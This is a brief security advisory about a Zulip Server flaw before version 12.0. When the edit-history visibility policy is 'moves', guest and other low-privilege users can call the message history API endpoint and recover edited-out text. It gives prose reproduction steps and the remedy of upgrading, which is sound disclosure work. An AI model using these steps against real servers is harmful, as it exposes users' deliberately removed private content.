Zulip Server Message Edit History Leakage Vulnerability

A vulnerability in Zulip Server prior to version 12.0 allows low-privilege users to access edited message content through the API, contrary to the intended privacy policy. This occurs when the message edit history visibility policy is set to 'moves', as the API still returns historical content values, enabling recovery of text that was deliberately edited out.

Impact

Exploitation of this vulnerability could lead to unauthorized access to sensitive information that users have edited out of their messages, violating privacy expectations.

Reproduction

To reproduce this vulnerability, set the message edit history visibility policy to 'moves' in a Zulip server realm. Then, have a user with owner privileges edit a message. A low-privilege user, such as a guest, can subsequently call the '/api/v1/messages/{id}/history' endpoint and retrieve the original content that was edited away, despite the policy intended to restrict such access.

Remediation

Users should update to Zulip Server version 12.0 or later, where this vulnerability has been fixed.